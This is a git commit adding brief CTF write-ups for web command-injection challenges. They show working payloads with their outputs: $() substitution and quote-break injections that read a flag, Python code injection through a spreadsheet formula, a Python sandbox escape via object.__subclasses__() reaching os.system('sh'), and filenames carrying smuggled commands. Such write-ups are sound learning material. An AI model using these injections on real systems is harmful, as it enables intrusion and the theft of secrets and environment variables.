Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/web-cmdi/01_gitpeek/writeup.txt
+++ b/web-cmdi/01_gitpeek/writeup.txt
@@ -0,0 +1,6 @@
+Some chars are banned.
+Still can inject command with $().
+INPUT: main $(echo "$FLAG")
+OUTPUT: fatal: ambiguous argument 'offsec{g1t_p33k_cmd_sub_8Skb0N4P7k3hgSpr}': unknown revision or path not in the working tree.
+Use '--' to separate paths from revisions, like this:
+'git <command> [<revision>...] -- [<file>...]'
--- a/web-cmdi/02_qrdrop/qr8.png
+++ b/web-cmdi/02_qrdrop/qr8.png
--- a/web-cmdi/02_qrdrop/writeup.txt
+++ b/web-cmdi/02_qrdrop/writeup.txt
@@ -0,0 +1,3 @@
+using ' We can escape the command and inject bash code.
+INPUT: prova'$(cat /flag.txt)'
+OUTPUT (from the decoded qr): provaoffsec{qr_dr0p_qu0t3_br34k_booPPFJAAhS0QtOb}
--- a/web-cmdi/03_spreadsheet/writeup.txt
+++ b/web-cmdi/03_spreadsheet/writeup.txt
@@ -0,0 +1,10 @@
+INPUT: ="PROVA"+os.system('ls')
+OUTPUT: can only concatenate str (not "int) with str
+
+Therefore we can execute python from website. But os.system return an integer
+instead of the output of command.
+
+From stackoverflow: os.popen("command").read() return the output of command:
+
+INPUT: ="PROVA"+os.popen('echo $FLAG').read()
+OUTPUT: "PROVA"+flag 
--- a/web-cmdi/04_autograding/test.py
+++ b/web-cmdi/04_autograding/test.py
@@ -0,0 +1 @@
+print("echo 'aaaa'")
--- a/web-cmdi/04_autograding/writeup.txt
+++ b/web-cmdi/04_autograding/writeup.txt
@@ -0,0 +1,28 @@
+Python sandbox blocks import etc.
+
+From here: https://github.com/jailctf/pyjailbreaker
+https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md
+Commands like this one can get the os module and execute system:
+[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')
+
+The sandbox still bans keyword like system. So
+def fibonacci(n):
+    # Your implementation here
+    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
+    print(os_mod.getenv('FLAG'))
+
+I tryed and found out that the FLAG is also set as environment variable and so I got it usig os.getenv('FLAG')
+
+WORK IN PROGRESS
+def fibonacci(n):
+    # Your implementation here
+    #for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
+    #    if 'codecs.In' in str(cls):
+    #        print(i, cls)
+    #        break
+    INDEX=127
+    dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
+    print(dictglobals.keys())
+    op_en =  ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
+#('/flag.txt','r')
+    #re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']
--- a/web-cmdi/05_virusvault/a
+++ b/web-cmdi/05_virusvault/a
--- a/web-cmdi/05_virusvault/a";
+++ b/web-cmdi/05_virusvault/a";
--- a/web-cmdi/05_virusvault/a;
+++ b/web-cmdi/05_virusvault/a;
--- a/web-cmdi/05_virusvault/test1.txt
+++ b/web-cmdi/05_virusvault/test1.txt
@@ -0,0 +1 @@
+'a'; $(echo "$FLAG");